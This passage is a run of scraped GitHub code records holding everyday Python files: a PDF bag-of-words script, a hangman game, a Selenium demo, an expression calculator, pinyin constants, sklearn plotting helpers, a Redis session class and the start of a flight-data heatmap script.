df['columna_unica'].str.replace('[^a-zA-Z0-9]', ' ')\r\n df['columna_unica'] = df['columna_unica'].str.strip()\r\n df['columna_unica'] = df['columna_unica'].str.replace(' ', ' ')\r\n df['columna_unica'] = df['columna_unica'].str.replace(' ', ' ')\r\n \r\n \r\n df = df[['file_name', 'columna_unica']]\r\n df = df.query('(columna_unica != \"\")')\r\n \r\n #https://countwordsfree.com/stopwords/spanish\r\n stop_words = [\"ALGÚN\",\"ALGUNA\",\"ALGUNAS\",\"ALGUNO\",\"ALGUNOS\",\"AMBOS\",\"AMPLEAMOS\",\"ANTE\",\"ANTES\",\"AQUEL\",\r\n \"AQUELLAS\",\"AQUELLOS\",\"AQUI\",\"ARRIBA\",\"ATRAS\",\"BAJO\",\"BASTANTE\",\"BIEN\",\"CADA\",\"CIERTA\",\r\n \"CIERTAS\",\"CIERTO\",\"CIERTOS\",\"COMO\",\"CON\",\"CONSEGUIMOS\",\"CONSEGUIR\",\"CONSIGO\",\"CONSIGUE\",\r\n \"CONSIGUEN\",\"CONSIGUES\",\"CUAL\",\"CUANDO\",\"DENTRO\",\"DESDE\",\"DONDE\",\"DOS\",\"EL\",\"ELLAS\",\"ELLOS\",\r\n \"EMPLEAIS\",\"EMPLEAN\",\"EMPLEAR\",\"EMPLEAS\",\"EMPLEO\",\"EN\",\"ENCIMA\",\"ENTONCES\",\"ENTRE\",\"ERA\",\r\n \"ERAMOS\",\"ERAN\",\"ERAS\",\"ERES\",\"ES\",\"ESTA\",\"ESTABA\",\"ESTADO\",\"ESTAIS\",\"ESTAMOS\",\"ESTAN\",\"ESTOY\",\r\n \"FIN\",\"FUE\",\"FUERON\",\"FUI\",\"FUIMOS\",\"GUENO\",\"HA\",\"HACE\",\"HACEIS\",\"HACEMOS\",\"HACEN\",\"HACER\",\"HACES\",\"HAGO\",\r\n \"INCLUSO\",\"INTENTA\",\"INTENTAIS\",\"INTENTAMOS\",\"INTENTAN\",\"INTENTAR\",\"INTENTAS\",\"INTENTO\",\"IR\",\"LA\",\"LARGO\",\r\n \"LAS\",\"LO\",\"LOS\",\"MIENTRAS\",\"MIO\",\"MODO\",\"MUCHOS\",\"MUY\",\"NOS\",\"NOSOTROS\",\"OTRO\",\"PARA\",\"PERO\",\"PODEIS\",\r\n \"PODEMOS\",\"PODER\",\"PODRIA\",\"PODRIAIS\",\"PODRIAMOS\",\"PODRIAN\",\"PODRIAS\",\"POR\",\"POR QUÉ\",\"PORQUE\",\"PRIMERO\",\r\n \"PUEDE\",\"PUEDEN\",\"PUEDO\",\"QUIEN\",\"SABE\",\"SABEIS\",\"SABEMOS\",\"SABEN\",\"SABER\",\"SABES\",\"SER\",\"SI\",\"SIENDO\",\r\n \"SIN\",\"SOBRE\",\"SOIS\",\"SOLAMENTE\",\"SOLO\",\"SOMOS\",\"SOY\",\"SU\",\"SUS\",\"TAMBIÉN\",\"TENEIS\",\"TENEMOS\",\"TENER\",\r\n \"TENGO\",\"TIEMPO\",\"TIENE\",\"TIENEN\",\"TODO\",\"TRABAJA\",\"TRABAJAIS\",\"TRABAJAMOS\",\"TRABAJAN\",\"TRABAJAR\",\"TRABAJAS\",\"TRABAJO\",\r\n \"TRAS\",\"TUYO\",\"ULTIMO\",\"UN\",\"UNA\",\"UNAS\",\"UNO\",\"UNOS\",\"USA\",\"USAIS\",\"USAMOS\",\"USAN\",\"USAR\",\"USAS\",\"USO\",\"VA\",\"VAIS\",\r\n \"VALOR\",\"VAMOS\",\"VAN\",\"VAYA\",\"VERDAD\",\"VERDADERA\",\"VERDADERO\",\"VOSOTRAS\",\"VOSOTROS\",\"VOY\",\"YO\",\"ÉL\",\r\n \"ÉSTA\",\"ÉSTAS\",\"ÉSTE\",\"ÉSTOS\",\"ÚLTIMA\",\"ÚLTIMAS\",\"ÚLTIMO\",\"ÚLTIMOS\",\"A\",\"AÑADIÓ\",\"AÚN\",\"ACTUALMENTE\",\"ADELANTE\",\r\n 
\"ADEMÁS\",\"AFIRMÓ\",\"AGREGÓ\",\"AHÍ\",\"AHORA\",\"AL\",\"ALGO\",\"ALREDEDOR\",\"ANTERIOR\",\"APENAS\",\"APROXIMADAMENTE\",\"AQUÍ\",\"ASÍ\",\r\n \"ASEGURÓ\",\"AUNQUE\",\"AYER\",\"BUEN\",\"BUENA\",\"BUENAS\",\"BUENO\",\"BUENOS\",\"CÓMO\",\"CASI\",\"CERCA\",\"CINCO\",\"COMENTÓ\",\"CONOCER\",\r\n \"CONSIDERÓ\",\"CONSIDERA\",\"CONTRA\",\"COSAS\",\"CREO\",\"CUALES\",\"CUALQUIER\",\"CUANTO\",\"CUATRO\",\"CUENTA\",\"DA\",\"DADO\",\"DAN\",\"DAR\",\r\n \"DE\",\"DEBE\",\"DEBEN\",\"DEBIDO\",\"DECIR\",\"DEJÓ\",\"DEL\",\"DEMÁS\",\"DESPUÉS\",\"DICE\",\"DICEN\",\"DICHO\",\"DIERON\",\"DIFERENTE\",\"DIFERENTES\",\r\n \"DIJERON\",\"DIJO\",\"DIO\",\"DURANTE\",\"E\",\"EJEMPLO\",\"ELLA\",\"ELLO\",\"EMBARGO\",\"ENCUENTRA\",\"ESA\",\"ESAS\",\"ESE\",\"ESO\",\"ESOS\",\r\n \"ESTÁ\",\"ESTÁN\",\"ESTABAN\",\"ESTAR\",\"ESTARÁ\",\"ESTAS\",\"ESTE\",\"ESTO\",\"ESTOS\",\"ESTUVO\",\"EX\",\"EXISTE\",\"EXISTEN\",\"EXPLICÓ\",\r\n \"EXPRESÓ\",\"FUERA\",\"GRAN\",\"GRANDES\",\"HABÍA\",\"HABÍAN\",\"HABER\",\"HABRÁ\",\"HACERLO\",\"HACIA\",\"HACIENDO\",\"HAN\",\"HASTA\",\"HAY\",\"HAYA\",\r\n \"HE\",\"HECHO\",\"HEMOS\",\"HICIERON\",\"HIZO\",\"HOY\",\"HUBO\",\"IGUAL\",\"INDICÓ\",\"INFORMÓ\",\"JUNTO\",\"LADO\",\"LE\",\"LES\",\"LLEGÓ\",\r\n \"LLEVA\",\"LLEVAR\",\"LUEGO\",\"LUGAR\",\"MÁS\",\"MANERA\",\"MANIFESTÓ\",\"MAYOR\",\"ME\",\"MEDIANTE\",\"MEJOR\",\"MENCIONÓ\",\"MENOS\",\r\n \"MI\",\"MISMA\",\"MISMAS\",\"MISMO\",\"MISMOS\",\"MOMENTO\",\"MUCHA\",\"MUCHAS\",\"MUCHO\",\"NADA\",\"NADIE\",\"NI\",\r\n \"NINGÚN\",\"NINGUNA\",\"NINGUNAS\",\"NINGUNO\",\"NINGUNOS\",\"NO\",\"NOSOTRAS\",\"NUESTRA\",\"NUESTRAS\",\"NUESTRO\",\"NUESTROS\",\r\n \"NUEVA\",\"NUEVAS\",\"NUEVO\",\"NUEVOS\",\"NUNCA\",\"O\",\"OCHO\",\"OTRA\",\"OTRAS\",\"OTROS\",\"PARECE\",\"PARTE\",\"PARTIR\",\"PASADA\",\"PASADO\",\r\n \"PESAR\",\"POCA\",\"POCAS\",\"POCO\",\"POCOS\",\"PODRÁ\",\"PODRÁN\",\"PODRÍA\",\"PODRÍAN\",\"PONER\",\"POSIBLE\",\"PRÓXIMO\",\"PRÓXIMOS\",\r\n \"PRIMER\",\"PRIMERA\",\"PRIMEROS\",\"PRINCIPALMENTE\",\"PROPIA\",\"PROPIAS\",\"PROPIO\",\"PROPIOS\",\"PUDO\",\"PUEDA\",\"PUES\",\"QUÉ\",\"QUE\",\r\n \"QUEDÓ\",\"QUEREMOS\",\"QUIÉN\",\"QUIENES\",\"QUIERE\",\"REALIZÓ\",\"REALIZADO\",\"REALIZAR\",\"RESPECTO\",\"SÍ\",\"SÓLO\",\"SE\",\"SEÑALÓ\",\r\n \"SEA\",\"SEAN\",\"SEGÚN\",\"SEGUNDA\",\"SEGUNDO\",\"SEIS\",\"SERÁ\",\"SERÁN\",\"SERÍA\",\"SIDO\",\"SIEMPRE\",\"SIETE\",\"SIGUE\",\"SIGUIENTE\",\"SINO\",\r\n \"SOLA\",\"SOLAS\",\"SOLOS\",\"SON\",\"TAL\",\"TAMPOCO\",\"TAN\",\"TANTO\",\"TENÍA\",\"TENDRÁ\",\"TENDRÁN\",\"TENGA\",\"TENIDO\",\"TERCERA\",\r\n \"TODA\",\"TODAS\",\"TODAVÍA\",\"TODOS\",\"TOTAL\",\"TRATA\",\"TRAVÉS\",\"TRES\",\"TUVO\",\"USTED\",\"VARIAS\",\"VARIOS\",\"VECES\",\r\n \"VER\",\"VEZ\",\"Y\",\"YA\",\r\n \"DE\"]\r\n \r\n #cu_wo_sw: Columna Unica Without StopWords\r\n df['cu_wo_sw'] = df['columna_unica']\r\n df['cu_wo_sw'] = [' '.join([item for item in x.split() \r\n if item not in stop_words]) \r\n for x in df['columna_unica']]\r\n \r\n df['line_text'] = range(1, len(df) + 1)\r\n \r\n #Bag of words\r\n df_bow = collections.Counter([y for x in df.cu_wo_sw.values.flatten() for y in x.split()])\r\n df_bow = pd.DataFrame.from_dict(df_bow, orient='index')\r\n df_bow.reset_index(level=0, inplace=True)\r\n df_bow.columns = ['bow' , 'freq']\r\n df_bow['file_name'] = file\r\n df_bow['len'] = df_bow['bow'].str.len()\r\n \r\n \r\n df_bow_append = df_bow_append.append(df_bow)\r\n del df\r\n del df_bow\r\n \r\n except:\r\n print('Error parsing txt')\r\n \r\ndf_bow_append.to_excel(join(path_data,'bow_contratos.xlsx') , index = False)\r\n 
\r\n","repo_name":"Tooruogata/Conosce_PDF_OCR_BOW","sub_path":"conosce_pdf_bagwords_G.py","file_name":"conosce_pdf_bagwords_G.py","file_ext":"py","file_size_in_byte":13492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27697449464","text":"# HANGMAN 4 --- Keeping track of the lives\n\nimport random \n\nstages = ['''\n +---+\n | |\n O |\n /|\\ |\n / \\ |\n |\n=========\n''', '''\n +---+\n | |\n O |\n /|\\ |\n / |\n |\n=========\n''', '''\n +---+\n | |\n O |\n /|\\ |\n |\n |\n=========\n''', '''\n +---+\n | |\n O |\n /| |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n | |\n |\n |\n=========\n''', '''\n +---+\n | |\n O |\n |\n |\n |\n=========\n''', '''\n +---+\n | |\n |\n |\n |\n |\n=========\n''']\n\nword_list = [\"ardvark\", \"baboon\", \"camel\"]\nchosen_word = random.choice(word_list)\n\nlives = 6\n\n\n# Testing code\nprint(f\"pssst, the word is {chosen_word}\")\n\n# create empty list called display\ndisplay = []\n\n# replace each letter in chosen_word with a blank \n# inserted into the display list\nword_len = len(chosen_word)\nfor _ in range(word_len):\n display += \"_\"\n# print(display)\n\n# user to guess a letter\n\nend_of_game = False\nwhile not end_of_game:\n guess = input(\"Guess a letter: \").lower()\n\n # looping through each position in the chosen_word \n # if the letter matches guess at that position, then the guess should \n # displayed removing the blank at that position\n\n for position in range(word_len):\n # if chosen_word[position] == guess:\n # display[position] = guess. OR\n letter = chosen_word[position]\n if letter == guess:\n display[position] = letter\n \n # for guess not in letter, the lives get reduced\n if guess not in chosen_word:\n lives -= 1\n if lives == 0:\n end_of_game = True\n print(\"You Lose\")\n # joining all the elements in the list and turn it to a string\n print(f\"{''.join(display)}\")\n\n if \"_\" not in display:\n end_of_game = True\n print(\"You Win\")\n\n print(stages[lives])\n","repo_name":"dhayomax/Python","sub_path":"beginner level/hangman4.py","file_name":"hangman4.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40869179596","text":"import time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\n\ndriver_path = r\"C:\\Users\\akshay.nv\\Downloads\\chromedriver-win64\\chromedriver-win64\\chromedriver.exe\"\nservice = Service(driver_path)\ndriver = webdriver.Chrome(service=service)\ndriver.get(\"https://www.rahulshettyacademy.com/AutomationPractice/\")\nradiobuttons = driver.find_elements(By.CSS_SELECTOR, \".radioButton\")\nradiobuttons[2].click()\nassert radiobuttons[2].is_selected()\n\nassert driver.find_element(By.ID, \"displayed-text\").is_displayed()\ndriver.find_element(By.ID, \"hide-textbox\").click()\nassert not driver.find_element(By.ID, \"displayed-text\").is_displayed()\n\n\n#for radiobutton in radiobuttons:\n # if radiobutton.get_attribute('value') == \"radio2\":\n # radiobutton.click()\n # assert radiobutton.is_selected()\n # break\ntime.sleep(4)","repo_name":"Akshay507/GetDmeo","sub_path":"Selenium/Demo7_rediobutton.py","file_name":"Demo7_rediobutton.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"44290375460","text":"from itertools import permutations\n\n\ndef operation(num1, num2, op):\n if op == '+':\n return str(int(num1) + int(num2))\n if op == '-':\n return str(int(num1) - int(num2))\n if op == '*':\n return str(int(num1) * int(num2))\n\n\ndef calculate(expression, op):\n array = []\n temp = \"\"\n\n # 문자열에서 연산자와 숫자 분리\n for i in expression:\n # print('temp = {}, i = {}, i.isdigit = {}'.format(temp, i, i.isdigit()))\n if i.isdigit():\n temp += i\n else:\n array.append(temp)\n array.append(i)\n temp = \"\"\n array.append(temp)\n\n # 연산자 루프\n for o in op:\n stack = []\n while len(array) != 0:\n temp = array.pop(0)\n if temp == o:\n stack.append(operation(stack.pop(), array.pop(0), o))\n else:\n stack.append(temp)\n array = stack\n\n return abs(int(array[0]))\n\n\ndef solution(expression):\n # 조합식 리스트 만들기\n op = list(permutations(['+', '-', '*'], 3))\n print('op = {}'.format(op))\n result = []\n # 만들어진 조합식 리스트 만큼 계산\n for i in op:\n result.append(calculate(expression, i))\n return max(result)\n\n# expect 60420\nprint(solution(\"100-200*300-500+20\"))\n# expect 300\nprint(solution(\"50*6-3*2\"))","repo_name":"Slowth-KIM/crewcrew-coding-test-study","sub_path":"박은우/카카오기출문제/수식 최대화.py","file_name":"수식 최대화.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
+{"seq_id":"70037863556","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport os\nimport re\n\nfrom enum import IntEnum, unique\n\nfrom gupinyin import pinyin_dict\nfrom gupinyin import phrases_dict\nfrom gupinyin.compat import SUPPORT_UCS4\n\n# 词语拼音库\nPHRASES_DICT = phrases_dict.phrases_dict\n\n# 单字拼音库\nPINYIN_DICT = pinyin_dict.pinyin_dict\n\n# 利用环境变量控制不做copy操作(无自定义拼音库的情况), 以减少内存使用\nif not os.environ.get('GUPINYIN_NO_DICT_COPY'):\n PINYIN_DICT = PINYIN_DICT.copy()\n PHRASES_DICT = PHRASES_DICT.copy()\n\n# 匹配使用数字标识声调的字符的正则表达式\nRE_TONE2 = re.compile(r'([aeoiuvnm])([1-4])$')\n\n# 有拼音的汉字\nif SUPPORT_UCS4:\n RE_HANS = re.compile(\n r'^(?:['\n r'\\u3007' # 〇\n r'\\u3400-\\u4dbf' # CJK扩展A:[3400-4DBF]\n r'\\u4e00-\\u9fff' # CJK基本:[4E00-9FFF]\n r'\\uf900-\\ufaff' # CJK兼容:[F900-FAFF]\n r'\\U00020000-\\U0002A6DF' # CJK扩展B:[20000-2A6DF]\n r'\\U0002A703-\\U0002B73F' # CJK扩展C:[2A700-2B73F]\n r'\\U0002B740-\\U0002B81D' # CJK扩展D:[2B740-2B81D]\n r'\\U0002F80A-\\U0002FA1F' # CJK兼容扩展:[2F800-2FA1F]\n r'])+$'\n )\nelse:\n RE_HANS = re.compile( # pragma: no cover\n r'^(?:['\n r'\\u3007' # 〇\n r'\\u3400-\\u4dbf' # CJK扩展A:[3400-4DBF]\n r'\\u4e00-\\u9fff' # CJK基本:[4E00-9FFF]\n r'\\uf900-\\ufaff' # CJK兼容:[F900-FAFF]\n r'])+$'\n )\n\n\n@unique\nclass Style(IntEnum):\n \"\"\"拼音风格\"\"\"\n\n #: 普通风格,不带声调。如: 中国 -> ``zhong guo``\n NORMAL = 0\n #: 标准声调风格,拼音声调在韵母第一个字母上(默认风格)。如: 中国 -> ``zhōng guó``\n #: 声调风格2,即拼音声调在各个韵母之后,用数字 [1-4] 进行表示。如: 中国 -> ``zho1ng guo2``\n #: 声调风格3,即拼音声调在各个拼音之后,用数字 [1-4] 进行表示。如: 中国 -> ``zhong1 guo2``\n #: 声母风格,只返回各个拼音的声母部分(注:有的拼音没有声母,详见 `#27`_)。如: 中国 -> ``zh g``\n #: 首字母风格,只返回拼音的首字母部分。如: 中国 -> ``z g``\n #: 韵母风格,只返回各个拼音的韵母部分,不带声调。如: 中国 -> ``ong uo``\n #: 标准韵母风格,带声调,声调在韵母第一个字母上。如:中国 -> ``ōng uó``\n #: 韵母风格2,带声调,声调在各个韵母之后,用数字 [1-4] 进行表示。如: 中国 -> ``o1ng uo2``\n #: 韵母风格3,带声调,声调在各个拼音之后,用数字 [1-4] 进行表示。如: 中国 -> ``ong1 uo2``\n #: 注音风格,带声调,阴平(第一声)不标。如: 中国 -> ``ㄓㄨㄥ ㄍㄨㄛˊ``\n #: 注音风格,仅首字母。如: 中国 -> ``ㄓ ㄍ``\n\n\nNORMAL = STYLE_NORMAL = Style.NORMAL\n","repo_name":"enzeas/python-gupinyin","sub_path":"gupinyin/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"24370435818","text":"import numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.utils.multiclass import unique_labels\nfrom sklearn.metrics import roc_curve, auc, precision_recall_curve\nfrom sklearn.model_selection import learning_curve\nfrom sklearn.model_selection import ShuffleSplit\nimport matplotlib.pyplot as plt\n\n\ndef plot_roc_curve( y_predict_proba, y_truth):\n y_score = np.array(y_predict_proba)\n if len(y_truth.shape) == 1:\n dummies = pd.get_dummies(y_truth)\n y_dummies = dummies.values\n else:\n y_dummies = y_truth\n\n y_classes = dummies.columns\n\n # Compute ROC curve and ROC area for each class\n fpr = dict()\n tpr = dict()\n thresholds = dict()\n roc_auc = dict()\n for i, class_name in enumerate(y_classes):\n fpr[i], tpr[i], thresholds[i] = roc_curve(y_dummies[:, i], y_score[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n # Compute micro-average ROC curve and ROC area\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_dummies.ravel(), y_score.ravel())\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n\n plt.figure()\n lw = 2\n for i, class_name in enumerate(y_classes):\n plt.plot(fpr[i], tpr[i],\n lw=lw, label='%s (area = %0.2f)' % (class_name, roc_auc[i]))\n\n plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('Receiver operating characteristic')\n plt.legend(loc=\"lower right\")\n\n # threshold for positive class\n ax2 = plt.gca().twinx()\n ax2.plot(fpr[1], thresholds[1], markeredgecolor='r', linestyle='dashed', color='r')\n ax2.set_ylabel('Threshold')\n ax2.set_ylim([thresholds[1][-1], thresholds[1][0]])\n ax2.set_xlim([fpr[1][0], fpr[1][-1]])\n\n # plt.show()\n return plt.gcf()\n\n\ndef plot_precision_recall_curve(y_predict_proba, y_truth):\n y_score = np.array(y_predict_proba)\n if len(y_truth.shape) == 1:\n dummies = pd.get_dummies(y_truth)\n y_dummies = dummies.values\n else:\n y_dummies = y_truth\n\n y_classes = dummies.columns\n for i, class_name in enumerate(y_classes):\n precision, recall, thresholds = precision_recall_curve(y_dummies[:, i], y_score[:, i])\n\n plt.step(recall, precision,\n label=class_name,\n lw=2,\n where='post')\n\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.ylim([0.0, 1.05])\n plt.xlim([0.0, 1.0])\n plt.legend(loc=\"lower left\")\n\n # ax2 = plt.gca().twinx()\n # ax2.plot(recall[1:], thresholds, markeredgecolor='r',linestyle='dashed', color='r')\n # ax2.set_ylabel('Threshold')\n\n # plt.show()\n return plt.gcf()\n\n\ndef plot_confidence_performance(y_predict, y_predict_proba, y_truth, num_bins=20):\n predicted_probabilities = np.max(y_predict_proba, axis=1)\n is_correct = (y_truth == y_predict)\n ax = sns.regplot(x=predicted_probabilities, y=is_correct, x_bins=num_bins)\n plt.xlabel('Model Confidence')\n plt.ylabel('Average accuracy')\n # plt.show()\n return plt.gcf()\n\n\ndef plot_confusion_matrix(y_true, y_pred, classes=None,\n normalize=False,\n title=None,\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if not title:\n if normalize:\n title = 'Normalized confusion matrix'\n else:\n title = 'Confusion matrix, without normalization'\n\n # Compute confusion matrix\n cm = confusion_matrix(y_true, y_pred)\n if classes is not None:\n # Only use the labels that appear in the data\n classes = 
classes[unique_labels(y_true, y_pred)]\n else:\n classes = unique_labels(y_true, y_pred)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n fig, ax = plt.subplots()\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\n ax.figure.colorbar(im, ax=ax)\n # We want to show all ticks...\n ax.set(xticks=np.arange(cm.shape[1]),\n yticks=np.arange(cm.shape[0]),\n # ... and label them with the respective list entries\n xticklabels=classes, yticklabels=classes,\n title=title,\n ylabel='True label',\n xlabel='Predicted label')\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\n rotation_mode=\"anchor\")\n\n # Loop over data dimensions and create text annotations.\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i in range(cm.shape[0]):\n for j in range(cm.shape[1]):\n ax.text(j, i, format(cm[i, j], fmt),\n ha=\"center\", va=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n fig.tight_layout()\n return fig\n\n\ndef print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False, hide_threshold=None):\n \"\"\"pretty print for confusion matrixes\"\"\"\n columnwidth = max([len(x) for x in labels] + [5]) # 5 is value length\n empty_cell = \" \" * columnwidth\n\n # Begin CHANGES\n fst_empty_cell = (columnwidth - 3) // 2 * \" \" + \"t/p\" + (columnwidth - 3) // 2 * \" \"\n\n if len(fst_empty_cell) < len(empty_cell):\n fst_empty_cell = \" \" * (len(empty_cell) - len(fst_empty_cell)) + fst_empty_cell\n # Print header\n print(\" \" + fst_empty_cell, end=\" \")\n # End CHANGES\n\n for label in labels:\n print(\"%{0}s\".format(columnwidth) % label, end=\" \")\n\n print()\n # Print rows\n for i, label1 in enumerate(labels):\n print(\" %{0}s\".format(columnwidth) % label1, end=\" \")\n for j in range(len(labels)):\n cell = \"%{0}.1f\".format(columnwidth) % cm[i, j]\n if hide_zeroes:\n cell = cell if float(cm[i, j]) != 0 else empty_cell\n if hide_diagonal:\n cell = cell if i != j else empty_cell\n if hide_threshold:\n cell = cell if cm[i, j] > hide_threshold else empty_cell\n print(cell, end=\" \")\n print()\n\n\ndef plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,\n n_jobs=None, train_sizes=np.linspace(.1, 1.0, 5)):\n \"\"\"\n Generate a simple plot of the test and training learning curve.\n\n Parameters\n ----------\n estimator : object type that implements the \"fit\" and \"predict\" methods\n An object of that type which is cloned for each validation.\n\n title : string\n Title for the chart.\n\n X : array-like, shape (n_samples, n_features)\n Training vector, where n_samples is the number of samples and\n n_features is the number of features.\n\n y : array-like, shape (n_samples) or (n_samples, n_features), optional\n Target relative to X for classification or regression;\n None for unsupervised learning.\n\n ylim : tuple, shape (ymin, ymax), optional\n Defines minimum and maximum yvalues plotted.\n\n cv : int, cross-validation generator or an iterable, optional\n Determines the cross-validation splitting strategy.\n Possible inputs for cv are:\n - None, to use the default 3-fold cross-validation,\n - integer, to specify the number of folds.\n - :term:`CV splitter`,\n - An iterable yielding (train, test) splits as arrays of indices.\n\n For integer/None inputs, if ``y`` is binary or multiclass,\n :class:`StratifiedKFold` used. 
If the estimator is not a classifier\n or if ``y`` is neither binary nor multiclass, :class:`KFold` is used.\n\n Refer :ref:`User Guide ` for the various\n cross-validators that can be used here.\n\n n_jobs : int or None, optional (default=None)\n Number of jobs to run in parallel.\n ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.\n ``-1`` means using all processors. See :term:`Glossary `\n for more details.\n\n train_sizes : array-like, shape (n_ticks,), dtype float or int\n Relative or absolute numbers of training examples that will be used to\n generate the learning curve. If the dtype is float, it is regarded as a\n fraction of the maximum size of the training set (that is determined\n by the selected validation method), i.e. it has to be within (0, 1].\n Otherwise it is interpreted as absolute sizes of the training sets.\n Note that for classification the number of samples usually have to\n be big enough to contain at least one sample from each class.\n (default: np.linspace(0.1, 1.0, 5))\n \"\"\"\n plt.figure()\n plt.title(title)\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n train_sizes, train_scores, test_scores = learning_curve(\n estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label=\"Training score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\n label=\"Cross-validation score\")\n\n plt.legend(loc=\"best\")\n return plt\n\n\ndef plot_learning_curve_cv(X, y, estimator):\n title=''\n # Cross validation with N iterations to get smoother mean test and train\n # score curves, each time with 20% data randomly selected as a validation set.\n cv = ShuffleSplit(n_splits=5, test_size=0.2, random_state=0)\n plot_learning_curve(estimator, title, X, y, cv=cv, n_jobs=1)\n return plt.gcf()\n","repo_name":"Honeyfy/semi-supervised-text-classification","sub_path":"src/utils/analyze_model.py","file_name":"analyze_model.py","file_ext":"py","file_size_in_byte":10337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"30909863544","text":"# coding:utf-8\n\"\"\"\n这里是工具模块,用来存放在框架运行的过程中要用的一些功能函数或类\n\nBaseSession 用来保存往redis数据库中保存session信息,继承与字典,然后重写__setitem__和__getitem__方法\n\n\"\"\"\nfrom redis import StrictRedis\nfrom hashlib import sha3_256\n\n\nclass BaseSession:\n \"\"\"\n 类字典类\n 重写关键方法,将原本的操作转到使用redis数据库完成\n \"\"\"\n\n def __init__(self, session_config, secret_key, request_ob):\n self.redis_client = StrictRedis(host=session_config['host'], port=session_config['port'],\n db=session_config['database'])\n self.secret_key = secret_key\n self.request_ob = request_ob\n\n def __setitem__(self, key, value):\n \"\"\"\n 设置session信息,并保存为redis的哈希类型.\n session_id 首先尝试从请求体对象的cookies中找,如果没有则创建新的session_id并添加到请求体对象的set_cookie中去\n :param key:\n :param value:\n :return:\n \"\"\"\n try:\n session_id = self.request_ob.cookies.get('session_id')\n if session_id is None:\n secret_worker = sha3_256()\n secret_worker.update((self.secret_key + key).encode())\n session_id = secret_worker.hexdigest()\n self.request_ob.set_cookies({\"session_id\": session_id})\n session_id = 'miniFrame-session:' + session_id\n self.redis_client.hset(name=session_id, key=key, value=value)\n except Exception as e:\n raise e\n\n def __getitem__(self, key):\n try:\n session_id = self.request_ob.cookies.get('session_id')\n if session_id is None:\n raise KeyError(\n 'The cookies dict by request not have a key named ,'\n 'you may not create a session record before this'\n )\n session_id = 'miniFrame-session:' + session_id\n value = self.redis_client.hget(name=session_id, key=key)\n if value is None:\n raise KeyError(\n \"The session_id or the key nonexistent in redis database\"\n )\n return value.decode()\n except Exception as e:\n raise e\n\n\nclass _MiniFrameMetaClass(type):\n # 用来记录我们自定义父类的所有子类列表\n record_cls = []\n\n # 重写__new__方法,在创建好类后,如果这个类对象不是我们的父类则将这个子类记录下来\n def __new__(cls, name, bases, attrs):\n new_cls = type.__new__(cls, name, bases, attrs)\n if not name.startswith('Base'):\n _MiniFrameMetaClass.record_cls.append(new_cls)\n return new_cls\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"lzc978/common","sub_path":"miniFrame/miniFrame/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"40021700476","text":"import util\nimport numpy as np\nimport datetime\nimport matplotlib.pyplot as plt\nimport calendar\n\nif __name__ == \"__main__\":\n combined = util.load_cdf(\"Visualization/domestic.nc\")\n\n origin_airports = combined.coords[\"Origin\"].values\n destination_airports = combined.coords[\"Destination\"].values\n\n # Setup a nicer datastructure to work with\n # Keep in mind we want this heatmap to work both ways\n all_airports = list(set(origin_airports) | set(destination_airports))\n all_airports = sorted(all_airports)\n airport_indexes = {value: i for i, value in enumerate(all_airports)}\n heatmap_data = np.zeros(shape=(len(all_airports), len(all_airports)))\n\n # Get data for Dec-2019 by default\n # We'll make this animated later\n data = combined.sel(Month=datetime.datetime(2019, 12, 